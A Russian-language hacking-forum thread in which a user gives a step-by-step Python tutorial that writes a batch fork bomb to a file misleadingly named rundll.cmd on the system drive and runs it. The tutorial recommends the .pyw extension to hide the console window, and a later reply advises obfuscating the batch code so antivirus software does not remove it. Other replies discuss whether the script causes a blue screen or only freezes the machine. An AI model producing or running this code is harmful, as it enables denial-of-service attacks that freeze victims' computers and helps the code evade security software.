Fork Bomb (.pyw+.cmd) - ИСПОЛЬЗОВАТЬ НА СВОЙ СТРАХ И РИСК

Moxito

Вечная память
Сообщения
421
Реакции
41
ДЕЛАТЬ И ИСПОЛЬЗОВАТЬ НА СВОЙ СТРАХ И РИСК

Всем привет. В связи с популярностью такой штуки как Python, решил написать "полу-беспалевный" способ "крашнуть Windows", совместив Python с Batch.

Приступим.

Для начала мы "импортируем" пару модулей для создания и редактирования будущего Batch-файла.

Python:
import os
import sys

Начнем создание нового файла - "rundll.cmd" в корне системного диска.
Для этого создадим переменную gfile, и впишем туда "open (os.getenv("SystemDrive") + "rundll.cmd", "w")"
open
- "открываем" файл для записи (и таким способом создаем файл). os.getenv("SystemDrive") - равносильно GetEnvironment, то есть получить переменную "SystemDrive", то есть получить букву системного диска. "rundll.cmd" - название файла, расширение должно быть .bat/.cmd. "w" - от слова write, то есть "доступ на запись/редактирование файла".
Собственно, должно выйти так:
Python:
gfile = open (os.getenv("SystemDrive") + "rundll.cmd", "w")

Теперь, мы должны "использовать" данные из переменной "gfile". Используем известную штучку "write". А в скобки, после слова "write", напишите всё, что хотите "впихнуть" в файл. Для crash'а должно выйти так:
Python:
gfile.write ("@echo off & %0 | %0>nul")

Рекомендую не использовать много раз "write", ибо всё пишется в одну строчку.

Закрываем gfile.write:
Python:
gfile.close()

А теперь "вишенка на торте". Эта "вишенка" позволит запустить файл.
os.system позволит выполнить системные функции. Затем открываем скобки и прописываем путь к файлу. Я снова использовал os.getenv для получения буквы системного диска.
Python:
os.system(os.getenv("SystemDrive") + "rundll.cmd")


P.S.: можно не писать много, а просто выполнить os.fork()
Рекомендую сохранить с расширением .pyw, чтобы избежать открытия консоли.
Не рекомендую нарушать законы Вашей страны.
 
Можно по подробней процесс реализации краха системы?
Система так и не крашнулась на протежение 30 минут ждал.
Если есть Касперский то он удаляет файл. Можно обфуксировать код батника и тогда сработает. Или просто создайте батник (внутрь: %0 | %0) и попробуйте запустить. Кстати, процесс не завершить, только перезагрузка поможет
 
Касперского нет. Я в курсе как это сделать в батнике. Я вижу, что появляется нагрузка на процессор и появляются процессы.
Где крах системы?)) я то жду способ "крашнуть Windows")) для меня это получить BSOD
 
Касперского нет. Я в курсе как это сделать в батнике. Я вижу, что появляется нагрузка на процессор и появляются процессы.
Где крах системы?)) я то жду способ "крашнуть Windows")) для меня это получить BSOD
Система не идёт в бсод а просто жестоко тупит и отказывается делать что-либо
 
Система не идёт в бсод а просто жестоко тупит и отказывается делать что-либо
Ну тогда надо я думаю добавить в описание что будет происходить. Я не от того что не понимаю что там происходит поверьте я понимаю и даже больше))

Просто не совсем опытный человек не поймет что должно в итоге получиться) По этому я и задаю вопросы))
 
Судя по коду там идет попытка переполнения памяти. Нафига только это на нашем форуме.
 
Назад
Сверху Снизу